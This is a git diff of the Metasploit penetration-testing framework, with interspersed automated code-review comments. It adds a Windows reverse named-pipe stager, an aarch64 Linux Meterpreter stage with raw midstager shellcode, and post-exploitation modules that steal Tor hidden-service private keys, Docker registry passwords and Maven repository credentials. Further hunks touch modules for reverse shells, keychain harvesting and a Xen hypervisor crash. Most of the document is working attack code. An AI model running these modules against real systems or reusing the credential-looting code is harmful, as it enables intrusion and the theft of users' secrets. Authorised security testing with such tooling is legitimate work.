@@ -0,0 +1,30 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_named_pipe'
+require 'msf/core/payload/windows/x64/reverse_named_pipe'
+
+module MetasploitModule
+
+ CachedSize = 421
+
+ include Msf::Payload::Stager
+ include Msf::Payload::Windows::ReverseNamedPipe_x64
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Windows x64 Reverse Named Pipe (SMB) Stager',
+ 'Description' => 'Connect back to the attacker via a named pipe pivot',
+ 'Author' => ['OJ Reeves'],
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseNamedPipe,
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X64,
+ 'Convention' => 'handlerdi',
+ 'Stager' => { 'RequiresMidstager' => false }
+ ))
+ end
+
+end
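Review bot: The x86 and x64 stager files in this hunk are near-copies, but their `merge_info` hashes list `'Platform'` and `'Handler'` in opposite orders and only the x86 file ends with an extra blank line after the closing `end`; aligning the key order and dropping the trailing blank line keeps the two diffable side by side. Neither file says what `'Convention' => 'handleedi'` / `'handlerdi'` has to agree with; a one-line comment above the hash such as `# must be one of the Conventions the stage lists in PayloadCompat (stages/windows/meterpreter.rb)` would save a reader the cross-reference, since the matching stage hunk in this same diff is what adds those tokens.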
diff --git a/modules/payloads/stages/linux/aarch64/meterpreter.rb b/modules/payloads/stages/linux/aarch64/meterpreter.rb new file mode 100644 index 0000000000..ec2b24435f --- /dev/null +++ b/modules/payloads/stages/linux/aarch64/meterpreter.rb 
@@ -0,0 +1,118 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/base/sessions/meterpreter_aarch64_linux'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'rex/elfparsey'
+
+module MetasploitModule
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter',
+ 'Description' => 'Inject the mettle server payload (staged)',
+ 'Author' => [
+ 'Adam Cammack '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_AARCH64,
+ 'License' => MSF_LICENSE,
+ 'Session' => Msf::Sessions::Meterpreter_aarch64_Linux
+ )
+ )
+ end
+
+ def elf_ep(payload)
+ elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload))
+ elf.elf_header.e_entry
+ end
+
+ def handle_intermediate_stage(conn, payload)
+ entry_offset = elf_ep(payload)
+
+ # Generated from external/source/shellcode/linux/aarch64/stage_mettle.s
+ midstager = [
+
+ 0x10000782, # adr x2, f0
+ 0xb9400042, # ldr w2, [x2]
+ 0xaa0203ea, # mov x10, x2
+ 0xd34cfc42, # lsr x2, x2, #12
+ 0x91000442, # add x2, x2, #0x1
+ 0xd374cc42, # lsl x2, x2, #12
+ 0xaa1f03e0, # mov x0, xzr
+ 0xaa0203e1, # mov x1, x2
+ 0xd28000e2, # mov x2, #0x7 // #7
+ 0xd2800443, # mov x3, #0x22 // #34
+ 0xaa1f03e4, # mov x4, xzr
+ 0xaa1f03e5, # mov x5, xzr
+ 0xd2801bc8, # mov x8, #0xde // #222
+ 0xd4000001, # svc #0x0
+ 0xaa0a03e4, # mov x4, x10
+ 0xaa0003e3, # mov x3, x0
+ 0xaa0003ea, # mov x10, x0
+ 0xaa0c03e0, # mov x0, x12
+ 0xaa0303e1, # mov x1, x3
+ 0xaa0403e2, # mov x2, x4
+ 0xd28007e8, # mov x8, #0x3f // #63
+ 0xd4000001, # svc #0x0
+ 0x34000440, # cbz w0, e0
+ 0x8b000063, # add x3, x3, x0
+ 0xeb000084, # subs x4, x4, x0
+ 0x54ffff01, # b.ne 44
+ 0x10000480, # adr x0, f8
+ 0xf9400000, # ldr x0, [x0]
+ 0x8b0a0000, # add x0, x0, x10
+ 0xaa0003ee, # mov x14, x0
+ 0x910003e0, # mov x0, sp
+ 0x927cec1f, # and sp, x0, #0xfffffffffffffff0
+ 0x910183ff, # add sp, sp, #0x60
+ 0xd2800040, # mov x0, #0x2 // #2
+ 0xd2800da1, # mov x1, #0x6d // #109
+ 0xf90003e1, # str x1, [sp]
+ 0x910003e1, # mov x1, sp
+ 0xaa0c03e2, # mov x2, x12
+ 0xd2800003, # mov x3, #0x0 // #0
+ 0xd2800004, # mov x4, #0x0 // #0
+ 0xd28000e5, # mov x5, #0x7 // #7
+ 0xaa0a03e6, # mov x6, x10
+ 0xd28000c7, # mov x7, #0x6 // #6
+ 0xd2820008, # mov x8, #0x1000 // #4096
+ 0xd2800329, # mov x9, #0x19 // #25
+ 0xaa0a03ea, # mov x10, x10
+ 0xd280000b, # mov x11, #0x0 // #0
+ 0xa9bf2fea, # stp x10, x11, [sp,#-16]!
+ 0xa9bf27e8, # stp x8, x9, [sp,#-16]!
+ 0xa9bf1fe6, # stp x6, x7, [sp,#-16]!
+ 0xa9bf17e4, # stp x4, x5, [sp,#-16]!
+ 0xa9bf0fe2, # stp x2, x3, [sp,#-16]!
+ 0xa9bf07e0, # stp x0, x1, [sp,#-16]!
+ 0xd280001d, # mov x29, #0x0 // #0
+ 0xd280001e, # mov x30, #0x0 // #0
+ 0xd61f01c0, # br x14
+ 0xd2800000, # mov x0, #0x0 // #0
+ 0xd2800ba8, # mov x8, #0x5d // #93
+ 0xd4000001, # svc #0x0
+ 0xd503201f, # nop
+ payload.length,
+ 0x00000000, # .word 0x00000000
+ entry_offset,
+ 0x00000000, # .word 0x00000000
+ ].pack('V*')
+
+ print_status("Transmitting intermediate midstager...(#{midstager.length} bytes)")
+ conn.put([midstager.length].pack('V'))
+ conn.put(midstager) == midstager.length
+ end
+
+ def generate_stage(opts = {})
+ MetasploitPayloads::Mettle.new('aarch64-linux-musl',
+ generate_config(opts.merge({scheme: 'tcp'}))).to_binary :process_image
+ end
+end
diff --git a/modules/payloads/stages/windows/meterpreter.rb b/modules/payloads/stages/windows/meterpreter.rb
index 5128e74dcf..2774a9a7ee 100644
--- a/modules/payloads/stages/windows/meterpreter.rb
+++ b/modules/payloads/stages/windows/meterpreter.rb
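Review bot: `elf_ep` and `handle_intermediate_stage` carry no documentation, and the only hint that the last four entries of `midstager` are data rather than instructions is the `# .word` comment on the two padding words. I would add above `elf_ep` `# Returns the e_entry of the ELF image in +payload+, as parsed by Rex::ElfParsey.`, and above `payload.length,` `# Trailer consumed by the midstager: length at 0xf0 (adr x2, f0), entry offset at 0xf8 (adr x0, f8)`, which matches the 60 instruction words that precede it. `handle_intermediate_stage` could also state in a leading comment that its boolean return is whether the whole midstager was written to `conn`. In `generate_stage` the literal braces are redundant: `generate_config(opts.merge(scheme: 'tcp'))`.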
@@ -23,8 +23,8 @@ module MetasploitModule
 super(update_info(info,
 'Name' => 'Windows Meterpreter (Reflective Injection)',
 'Description' => 'Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)',
- 'Author' => ['skape','sf'],
- 'PayloadCompat' => { 'Convention' => 'sockedi'},
+ 'Author' => ['skape', 'sf', 'OJ Reeves'],
+ 'PayloadCompat' => { 'Convention' => 'sockedi handleedi http https'},
 'License' => MSF_LICENSE,
 'Session' => Msf::Sessions::Meterpreter_x86_Win
 ))
diff --git a/modules/payloads/stages/windows/x64/meterpreter.rb b/modules/payloads/stages/windows/x64/meterpreter.rb
index 1abdb6c8ce..de790efebf 100644
--- a/modules/payloads/stages/windows/x64/meterpreter.rb
+++ b/modules/payloads/stages/windows/x64/meterpreter.rb
@@ -23,8 +23,8 @@ module MetasploitModule
 super(update_info(info,
 'Name' => 'Windows Meterpreter (Reflective Injection x64)',
 'Description' => 'Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64)',
- 'Author' => ['skape','sf', 'OJ Reeves'],
- 'PayloadCompat' => { 'Convention' => 'sockrdi', },
+ 'Author' => ['skape', 'sf', 'OJ Reeves'],
+ 'PayloadCompat' => { 'Convention' => 'sockrdi handlerdi http https'},
 'License' => MSF_LICENSE,
 'Session' => Msf::Sessions::Meterpreter_x64_Win))
 end
diff --git a/modules/post/hardware/automotive/getvinfo.rb b/modules/post/hardware/automotive/getvinfo.rb
index dd310bf516..d387e929b5 100644
--- a/modules/post/hardware/automotive/getvinfo.rb
+++ b/modules/post/hardware/automotive/getvinfo.rb
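Review bot: Both rewritten `'PayloadCompat'` lines (the x86 hunk here and the x64 hunk on the same line) close the inner hash as `'http https'}` with no space before `}`, while the surrounding hashes in both files use `{ ... }` spacing; `{ 'Convention' => 'sockedi handleedi http https' }` keeps the style consistent. Nothing on the line says why transport names now appear in a list of register conventions; a short trailing comment, e.g. `# stagers that already hold the transport themselves`, hedged to whatever the actual reason is, would spare the next reader a search. The `initialize` bodies start outside the hunks.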
@@ -24,6 +24,7 @@ class MetasploitModule < Msf::Post OptInt.new('SRCID', [true, "Module ID to query", 0x7e0]), OptInt.new('DSTID', [false, "Expected reponse ID, defaults to SRCID + 8", 0x7e8]), OptInt.new('PADDING', [false, "Optinal end of packet padding", nil]), + OptBool.new('FC', [false, "Optinal forces flow control", nil]), OptBool.new('CLEAR_DTCS', [false, "Clear any DTCs and reset MIL if errors are present", false]), OptString.new('CANBUS', [false, "CAN Bus to perform scan on, defaults to connected bus", nil]) ]) @@ -33,6 +34,7 @@ class MetasploitModule < Msf::Post def run opt = {} opt['PADDING'] = datastore["PADDING"] if datastore["PADDING"] + opt['FC'] = datastore['FC'] if datastore['FC'] pids = get_current_data_pids(datastore["CANBUS"], datastore["SRCID"], datastore["DSTID"], opt) if pids.size == 0 print_status("No reported PIDs. You may not be properly connected") diff --git a/modules/post/linux/busybox/jailbreak.rb b/modules/post/linux/busybox/jailbreak.rb index db4dcdf0ac..af48869d8c 100644 --- a/modules/post/linux/busybox/jailbreak.rb +++ b/modules/post/linux/busybox/jailbreak.rb @@ -26,7 +26,7 @@ class MetasploitModule < Msf::Post super( 'Name' => 'BusyBox Jailbreak ', 'Description' => %q{ - This module will send a set of commands to a open session that is connected to a + This module will send a set of commands to an open session that is connected to a BusyBox limited shell (i.e. a router limited shell). It will try different known tricks to jailbreak the limited shell and get a full BusyBox shell. }, diff --git a/modules/post/linux/dos/xen_420_dos.rb b/modules/post/linux/dos/xen_420_dos.rb index 520d0daf88..0d63e6ac5b 100644 --- a/modules/post/linux/dos/xen_420_dos.rb +++ b/modules/post/linux/dos/xen_420_dos.rb 
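Review bot: The new `OptBool.new('FC', ...)` line copies the `Optinal` typo from the `PADDING` option above it and its description does not read as a sentence; `OptBool.new('FC', [false, "Optional: force flow control", false])` fixes both and gives the boolean the same `false` default that `CLEAR_DTCS` uses on the next line (the `if datastore['FC']` guard in the second hunk behaves identically for `nil` and `false`). The `register_options` array begins outside the hunk and `run` continues past it.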
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post 'Name' => 'Linux DoS Xen 4.2.0 2012-5525', 'Description' => %q( This module causes a hypervisor crash in Xen 4.2.0 when invoked from a - paravirtualised VM, including from dom0. Successfully tested on Debian 7 + paravirtualized VM, including from dom0. Successfully tested on Debian 7 3.2.0-4-amd64 with Xen 4.2.0.), 'References' => [ ['CVE', '2012-5525'] ], 'License' => MSF_LICENSE, diff --git a/modules/post/linux/gather/tor_hiddenservices.rb b/modules/post/linux/gather/tor_hiddenservices.rb new file mode 100644 index 0000000000..5ab4c55671 --- /dev/null +++ b/modules/post/linux/gather/tor_hiddenservices.rb 
@@ -0,0 +1,103 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+# Adapted from post/linux/gather/enum_configs.rb
+##
+
+class MetasploitModule < Msf::Post
+
+ include Msf::Post::Linux::System
+ include Msf::Post::Linux::Priv
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Linux Gather TOR Hidden Services',
+ 'Description' => %q{
+ This module collects the hostnames name and private keys of
+ any TOR Hidden Services running on the target machine. It
+ will search for torrc and if found, will parse it for the
+ directories of Hidden Services. However, root permissions
+ are required to read them as they are owned by the user that
+ TOR runs as, usually a separate account.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Harvey Phillips ',
+ ],
+ 'Platform' => ['linux'],
+ 'SessionTypes' => ['shell', 'meterpreter']
+ ))
+ end
+
+ def run
+ distro = get_sysinfo
+ h = get_host
+ print_status("Running module against #{h}")
+ print_status("Info:")
+ print_status("\t#{distro[:version]}")
+ print_status("\t#{distro[:kernel]}")
+ print_status("Looking for torrc...")
+ find_torrc
+ end
+
+ def save(file, data, ltype, ctype="text/plain")
+ fname = ::File.basename(file)
+ loot = store_loot(ltype, ctype, session, data, fname)
+ print_status("#{fname} stored in #{loot.to_s}")
+ end
+
+ def get_host
+ case session.type
+ when /meterpreter/
+ host = sysinfo["Computer"]
+ when /shell/
+ host = cmd_exec("hostname").chomp
+ end
+
+ return host
+ end
+
+ def find_torrc
+ config = cmd_exec("locate 'torrc' | grep -v 'torrc.5.gz'").split("\n")
+ if config.length == 0
+ print_error ("No torrc file found, maybe it goes by a different name?")
+ else
+ hidden = Array.new
+ # For every torrc file found, parse them for HiddenServiceDir
+ config.each do |c|
+ print_good("Torrc file found at #{c}")
+ services = cmd_exec("cat #{c} | grep HiddenServiceDir | grep -v '#' | cut -d 
' ' -f 2").split("\n") + # For each HiddenServiceDir found in the torrc(s), push them to the hidden array + services.each do |s| + hidden.push(s) + end + end + # Remove any duplicate entries + hidden = hidden.uniq + # If hidden is empty, then no Hidden Services are running. + if hidden.length != 0 + print_good("#{hidden.length} hidden services have been found!") + else + print_bad("No hidden services were found!") + end + + if is_root? + # For all the Hidden Services found, loot hostname file + hidden.each do |f| + output = read_file("#{f}hostname") + save(f, output, "tor.#{f.split("/")[-1]}.hostname") if output && output !~ /No such file or directory/ + end + + # For all the Hidden Services found, loot private_key file + hidden.each do |f| + output = read_file("#{f}private_key") + save(f, output, "tor.#{f.split("/")[-1]}.privatekey") if output && output !~ /No such file or directory/ + end + else + print_error("Hidden Services were found, but we need root to access the directories") + end + end + end +end diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index dcd44542ef..826aa5f99f 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings, creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these - filenames to /etc/passwd, then sending a packet with a priviliged user entry contained within. + filenames to /etc/passwd, then sending a packet with a privileged user entry contained within. This, and all the other packets, are appended to /etc/passwd. Successful exploitation results in the creation of a new superuser account. 
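Review bot: In `find_torrc` the `if is_root?` block runs even when `hidden` is empty, so a non-root session whose torrc has no `HiddenServiceDir` entries prints `No hidden services were found!` and then, immediately, `Hidden Services were found, but we need root to access the directories`. Returning right after the `print_bad` (`return if hidden.empty?`, which also lets the `hidden.length != 0` test read as `unless hidden.empty?`) removes the contradiction. `print_error ("No torrc file found, ...")` has a space before the parenthesis, which Ruby warns about, and `hidden = Array.new` plus the `services.each { push }` loop is the long form of `hidden = []` and `hidden.concat(services)`. The method starts in the previous physical line of the hunk.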
diff --git a/modules/post/multi/gather/dns_srv_lookup.rb b/modules/post/multi/gather/dns_srv_lookup.rb index 8652558413..2a66d4a693 100644 --- a/modules/post/multi/gather/dns_srv_lookup.rb +++ b/modules/post/multi/gather/dns_srv_lookup.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Post super( update_info( info, 'Name' => 'Multi Gather DNS Service Record Lookup Scan', 'Description' => %q{ - Enumerates know SRV Records for a given domaon using target host DNS query tool. + Enumerates known SRV Records for a given domain using target host DNS query tool. }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Post register_options( [ - OptString.new('DOMAIN', [true, 'Domain ro perform SRV query against.']) + OptString.new('DOMAIN', [true, 'Domain to perform SRV query against.']) ]) end diff --git a/modules/post/multi/gather/docker_creds.rb b/modules/post/multi/gather/docker_creds.rb new file mode 100644 index 0000000000..107bb7b829 --- /dev/null +++ b/modules/post/multi/gather/docker_creds.rb 
@@ -0,0 +1,93 @@
+##
+ # This module requires Metasploit: https://metasploit.com/download
+ # Current source: https://github.com/rapid7/metasploit-framework
+##
+
+ require 'json'
+
+ class MetasploitModule < Msf::Post
+ include Msf::Post::File
+ include Msf::Post::Unix
+
+ def initialize(info={})
+ super( update_info(info,
+ 'Name' => 'Multi Gather Docker Credentials Collection',
+ 'Description' => %q{
+ This module will collect the contents of all users' .docker directories on the targeted
+ machine. If the user has already push to docker hub, chances are that the password was
+ saved in base64 (default behavior).
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => ['Flibustier'],
+ 'Platform' => %w{ bsd linux osx unix },
+ 'SessionTypes' => ['shell']
+ ))
+ end
+
+ # This module is largely based on gpg_creds.rb.
+
+ def run
+ print_status("Finding .docker directories")
+ paths = enum_user_directories.map {|d| d + "/.docker"}
+ # Array#select! is only in 1.9
+ paths = paths.select { |d| directory?(d) }
+
+ if paths.nil? || paths.empty?
+ print_error("No users found with a .docker directory")
+ return
+ end
+
+ download_loot(paths)
+ end
+
+ def download_loot(paths)
+ print_status("Looting #{paths.count} directories")
+ paths.each do |path|
+ path.chomp!
+ file = "config.json"
+ target = "#{path}/#{file}"
+
+ if file? target
+ print_status("Downloading #{target} -> #{file}")
+ extract(target)
+ end
+ end
+ end
+
+ def extract(target)
+ file = read_file(target)
+ parsed = JSON.parse(file)
+ if parsed["auths"]
+ parsed["auths"].each do |key, value|
+ vprint_status("key: #{key}")
+ value.each do |k,v|
+ if k == "auth"
+ plain = Rex::Text.decode_base64(v)
+ if plain.include? ":"
+
+ print_good("Found #{plain}")
+ username, password = plain.split(':')
+ credential_data = {
+ origin_type: :import,
+ module_fullname: self.fullname,
+ filename: target,
+ workspace_id: myworkspace_id,
+ service_name: 'docker',
+ realm_value: key,
+ realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+ private_type: :password,
+ private_data: password,
+ username: username
+ }
+ create_credential(credential_data)
+
+ print_good("Saved credentials")
+ end
+ end
+ end
+ end
+ else
+ print_status("No credentials found in config file")
+ end
+ end
+end
diff --git a/modules/post/multi/gather/enum_vbox.rb b/modules/post/multi/gather/enum_vbox.rb
index 3f1e1ecd9e..d4208723b5 100644
--- a/modules/post/multi/gather/enum_vbox.rb
+++ b/modules/post/multi/gather/enum_vbox.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module will attempt to enumerate any VirtualBox VMs on the target machine. Due to the nature of VirtualBox, this module can only enumerate VMs registered
- for the current user, thereforce, this module needs to be invoked from a user context.
+ for the current user, therefore, this module needs to be invoked from a user context. }, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'],
diff --git a/modules/post/multi/gather/gpg_creds.rb b/modules/post/multi/gather/gpg_creds.rb
index 611addd134..e383640ebb 100644
--- a/modules/post/multi/gather/gpg_creds.rb
+++ b/modules/post/multi/gather/gpg_creds.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Post # Array#select! is only in 1.9 paths = paths.select { |d| directory?(d) }
- if paths.nil? or paths.empty?
+ if paths.nil? || paths.empty? print_error("No users found with a .gnupg directory") return end 
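Review bot: `extract` parses whatever `read_file` returns with no error handling: `parsed = JSON.parse(file)` raises `JSON::ParserError` on a malformed config.json and `TypeError` when `read_file` yields nil, and because `extract` is called inside the `paths.each` loop of `download_loot`, one bad file aborts the whole run instead of skipping that directory. I would guard the parse: `parsed = JSON.parse(file)` / `rescue JSON::ParserError, TypeError => e` / `print_error("Could not parse #{target}: #{e.message}"); return`. A second correctness point in the same method: `username, password = plain.split(':')` drops everything after the second colon, so a decoded value whose password contains `:` is stored truncated; `plain.split(':', 2)` keeps the remainder intact. Minor style: `paths.nil?` in `run` is dead since `select` always returns an Array.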
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Post if directory?(target) next end - print_status("Downloading #{path}#{sep}#{file} -> #{file}") + print_status("Downloading #{target} -> #{file}") data = read_file(target) file = file.split(sep).last type = file.gsub(/\.gpg.*/, "").gsub(/gpg\./, "") diff --git a/modules/post/multi/gather/maven_creds.rb b/modules/post/multi/gather/maven_creds.rb new file mode 100644 index 0000000000..e6d278d43f --- /dev/null +++ b/modules/post/multi/gather/maven_creds.rb 
@@ -0,0 +1,150 @@
+
+##
+ # This module requires Metasploit: https://metasploit.com/download
+ # Current source: https://github.com/rapid7/metasploit-framework
+##
+
+ require 'nokogiri'
+
+ class MetasploitModule < Msf::Post
+ include Msf::Post::File
+ include Msf::Post::Unix
+
+ def initialize(info={})
+ super( update_info(info,
+ 'Name' => 'Multi Gather Maven Credentials Collection',
+ 'Description' => %q{
+ This module will collect the contents of all users settings.xml on the targeted
+ machine.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => ['elenoir'],
+ 'Platform' => %w{ bsd linux osx unix win },
+ 'SessionTypes' => ['shell','meterpreter']
+ ))
+ end
+
+ def gathernix
+ print_status("Unix OS detected")
+ files = cmd_exec('locate settings.xml').split("\n")
+ # Handle case where locate does not exist (error is returned in first element)
+ if files.length == 1 && !directory?(files.first)
+ files = []
+ paths = enum_user_directories.map {|d| d}
+ if paths.nil? || paths.empty?
+ print_error("No users directory found")
+ return
+ end
+ paths.each do |path|
+ path.chomp!
+ file = "settings.xml"
+ target = "#{path}/#{file}"
+ if file? target
+ files.push(target)
+ end
+ end
+ end
+ return files
+ end
+
+ def gatherwin
+ print_status("Windows OS detected")
+ return cmd_exec('cd\ && dir settings.xml /b /s').split("\n")
+ end
+
+ def run
+ print_status("Finding user directories")
+ files = ""
+ case session.platform
+ when 'windows'
+ files = gatherwin
+ when 'unix', 'linux', 'bsd', 'osx'
+ files = gathernix
+ else
+ print_error("Incompatible platform")
+ end
+ if files.nil? || files.empty?
+ print_error("No settings.xml file found")
+ return
+ end
+ download_loot(files)
+ end
+
+ def download_loot(files)
+ print_status("Looting #{files.count} files")
+ files.each do |target|
+ target.chomp!
+ if file? target
+ print_status("Downloading #{target}")
+ extract(target)
+ end
+ end
+ end
+
+ def parse_settings(target, data)
+ xml_doc = Nokogiri::XML(data)
+ xml_doc.remove_namespaces!
+
+ xml_doc.xpath("//server").each do |server|
+ id = server.xpath("id").text
+ username = server.xpath("username").text
+ password = server.xpath("password").text
+
+ print_status("Collected the following credentials:")
+ print_status(" Id: %s" % id)
+ print_status(" Username: %s" % username)
+ print_status(" Password: %s" % password)
+
+ print_status("Try to find url from id...")
+ realm = ""
+
+ xml_doc.xpath("//mirror[id = '#{id}']").each do |mirror|
+ realm = mirror.xpath("url").text
+ print_status("Found url in mirror : #{realm}")
+ end
+
+ if realm.blank?
+ xml_doc.xpath("//repository[id = '#{id}']").each do |repository|
+ realm = repository.xpath("url").text
+ print_status("Found url in repository : #{realm}")
+ end
+ end
+
+ if realm.blank?
+ print_status("No url found, id will be set as realm")
+ realm = id
+ end
+
+ print_line("")
+
+ credential_data = {
+ origin_type: :import,
+ module_fullname: self.fullname,
+ filename: target,
+ service_name: 'maven',
+ realm_value: realm,
+ realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+ private_type: :password,
+ private_data: password,
+ username: username,
+ workspace_id: myworkspace_id
+ }
+ create_credential(credential_data)
+ end
+ end
+
+ def extract(target)
+ print_status("Reading settings.xml file from #{target}")
+ data = ""
+ if session.type == "shell"
+ data = session.shell_command("cat #{target}")
+ else
+ settings = session.fs.file.new("#{target}", "rb")
+ until settings.eof?
+ data << settings.read
+ end
+ end
+
+ parse_settings(target, data)
+ end
+end
diff --git a/modules/post/multi/gather/thunderbird_creds.rb b/modules/post/multi/gather/thunderbird_creds.rb
index 105a618139..d42e996b47 100644
--- a/modules/post/multi/gather/thunderbird_creds.rb
+++ b/modules/post/multi/gather/thunderbird_creds.rb
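Review bot: The locate-failure heuristic in `gathernix`, `if files.length == 1 && !directory?(files.first)`, cannot distinguish an error line from a genuine single hit: a real settings.xml is a file, so `!directory?` is true for it too and the one valid result is thrown away before the fallback scan runs. The comment above it says the intent is to detect a missing `locate`, so the test should be `if files.length == 1 && !file?(files.first)` (or check the command's output for the error text explicitly). Separately, `extract` builds `"cat #{target}"` from a path taken straight out of `locate`/`dir` output without quoting, so any path containing a space or shell metacharacter will be read incorrectly or fail; wrapping the argument (`"cat '#{target}'"` at minimum, or using `read_file(target)` as the other modules in this commit do) avoids that. `parse_settings` also interpolates `id` from the parsed document into an XPath expression; since the value comes from the same file it is low risk, but `xml_doc.xpath("//mirror[id = $id]", nil, id: id)` would keep it out of the query string.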
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post the necessary files such as 'signons.sqlite', 'key3.db', and 'cert8.db' for offline decryption with third party tools. - If necessary, you may also set the PARSE optioin to true to parse the sqlite + If necessary, you may also set the PARSE option to true to parse the sqlite file, which contains sensitive information such as the encrypted username/password. However, this feature is not enabled by default, because it requires SQLITE3 gem to be installed on your machine. diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb index 53f2aadcdf..c19958a2ec 100644 --- a/modules/post/multi/manage/system_session.rb +++ b/modules/post/multi/manage/system_session.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Post 'Name' => 'Multi Manage System Remote TCP Shell Session', 'Description' => %q{ This module will create a Reverse TCP Shell on the target system - using the system own scripting enviroments installed on the + using the system's own scripting environments installed on the target. }, 'License' => MSF_LICENSE, @@ -55,7 +55,7 @@ class MetasploitModule < Msf::Post end if not cmd.empty? - print_status("Executing reverse tcp shel to #{lhost} on port #{lport}") + print_status("Executing reverse tcp shell to #{lhost} on port #{lport}") cmd_exec("(#{cmd} &)") end end diff --git a/modules/post/osx/gather/enum_chicken_vnc_profile.rb b/modules/post/osx/gather/enum_chicken_vnc_profile.rb index 54694a1dc8..fc7a2f84de 100644 --- a/modules/post/osx/gather/enum_chicken_vnc_profile.rb +++ b/modules/post/osx/gather/enum_chicken_vnc_profile.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module will download the "Chicken of the VNC" client application's profile file, which is used to store other VNC servers' information such - as as the IP and password. + as the IP and password. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], 
diff --git a/modules/post/osx/gather/enum_keychain.rb b/modules/post/osx/gather/enum_keychain.rb index 2cae840a30..a612592da9 100644 --- a/modules/post/osx/gather/enum_keychain.rb +++ b/modules/post/osx/gather/enum_keychain.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Post This module presents a way to quickly go through the current user's keychains and collect data such as email accounts, servers, and other services. Please note: when using the GETPASS and GETPASS_AUTO_ACCEPT option, the user may see an authentication - alert flash briefly on their screen that gets dismissed by a programatically triggered click. + alert flash briefly on their screen that gets dismissed by a programmatically triggered click. }, 'License' => MSF_LICENSE, 'Author' => [ 'ipwnstuff ', 'joev' ], diff --git a/modules/post/osx/gather/safari_lastsession.rb b/modules/post/osx/gather/safari_lastsession.rb index 2a8b233aa9..d60051d58f 100644 --- a/modules/post/osx/gather/safari_lastsession.rb +++ b/modules/post/osx/gather/safari_lastsession.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Post to find the credential for Gmail. The Gmail's last session state may contain the user's credential if his/her first login attempt failed (likely due to a typo), and then the page got refreshed or another login attempt was made. This also means - the stolen credential might contains typos. + the stolen credential might contain typos. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], diff --git a/modules/post/solaris/gather/checkvm.rb b/modules/post/solaris/gather/checkvm.rb index 777e80720c..4e690f439d 100644 --- a/modules/post/solaris/gather/checkvm.rb +++ b/modules/post/solaris/gather/checkvm.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module attempts to determine whether the system is running inside of a virtual environment and if so, which one. This - module supports detectoin of Solaris Zone, VMWare, VirtualBox, Xen, + module supports detection of Solaris Zone, VMWare, VirtualBox, Xen, and QEMU/KVM.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], diff --git a/modules/post/windows/gather/checkvm.rb b/modules/post/windows/gather/checkvm.rb index fc9151819d..8f2decf674 100644 --- a/modules/post/windows/gather/checkvm.rb +++ b/modules/post/windows/gather/checkvm.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module attempts to determine whether the system is running inside of a virtual environment and if so, which one. This - module supports detectoin of Hyper-V, VMWare, Virtual PC, + module supports detection of Hyper-V, VMWare, Virtual PC, VirtualBox, Xen, and QEMU. }, 'License' => MSF_LICENSE, diff --git a/modules/post/windows/gather/credentials/flashfxp.rb b/modules/post/windows/gather/credentials/flashfxp.rb index 18c47ac40b..ce33d25421 100644 --- a/modules/post/windows/gather/credentials/flashfxp.rb +++ b/modules/post/windows/gather/credentials/flashfxp.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post super(update_info(info, 'Name' => 'Windows Gather FlashFXP Saved Password Extraction', 'Description' => %q{ - This module extracts weakly encrypted saved FTP Passwords from FlashFXP. It + This module extracts weakly encrypted saved FTP Passwords from FlashFXP. It finds saved FTP connections in the Sites.dat file. }, 'License' => MSF_LICENSE, 'Author' => [ 'theLightCosine'], diff --git a/modules/post/windows/gather/enum_domain_users.rb b/modules/post/windows/gather/enum_domain_users.rb index abaa9efc3e..4b3c8646eb 100644 --- a/modules/post/windows/gather/enum_domain_users.rb +++ b/modules/post/windows/gather/enum_domain_users.rb 
